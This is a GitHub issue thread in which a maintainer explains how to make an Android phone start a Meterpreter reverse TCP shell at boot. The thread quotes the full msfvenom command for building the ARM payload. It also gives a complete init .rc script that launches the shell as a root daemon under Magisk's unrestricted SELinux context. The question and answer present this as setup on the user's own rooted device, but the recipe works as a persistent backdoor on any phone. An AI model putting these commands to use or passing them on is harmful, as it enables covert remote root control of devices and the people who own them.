LuigiVampa92
commented
9 months ago Hi, thanks for your interest to the project.
The msfvenom is a cli tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp is a type of payload - reverse shell, tcp, for Linux OS and ARM CPUs, -f elf is a file format - linux binary executable. So, when it ran it will connect to the LHOST host on LPORT port (you must control this host and have a listener waiting there for connection), and you will get a shell to the target device.
The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (/system/bin/revshell), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:
service revshell /system/bin/revshell
disabled
seclabel u:r:magisk:s0
shutdown critical
on property:sys.boot_completed=1
start revshellSo create file /system/etc/init/revshell.rc on your smartphone with the content above and it will automatically be executed by init process during system load. The stuff in this sctipt is:
service revshell /system/bin/revshell - pretty much self explainatory. It is a definition of your system service in format service SERVICE_NAME PATH_TO_SERVICE_BINARY.
disabled - is the marker that tells that service is disabled by default, but conditions of its start is simply described below (on property:sys.boot_completed). The idea is to not start the service until the system and other services are fully booted, just in case to make sure everythings be smooth, no missing mounts etc.
seclabel u:r:magisk:s0 - it is a definition of a SELinux context that needs to be set on your service process. That's the most critical part. The Magisk injects a special SELinux context for itself to run its own daemon (magiskd), and this context is "allmighty", it has absolutely zero restrictions in the system, technically magiskd spawns new processes with shells for you when you call su with this exact context. If you will not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start revshell service from the init process context
shutdown critical - this line tell to consider this service critical for the system. It is not sctrictly necessary but adds some minor benefits, so why not?
Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.
The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system.
Hope it helps, sorry for a long answer
gabriel-maxx
Hi could you tell me something if I have a rooted android device then how do I:
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell
I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/
but explain to me what the content of this rc script would look like? What do I have to put inside for it to work?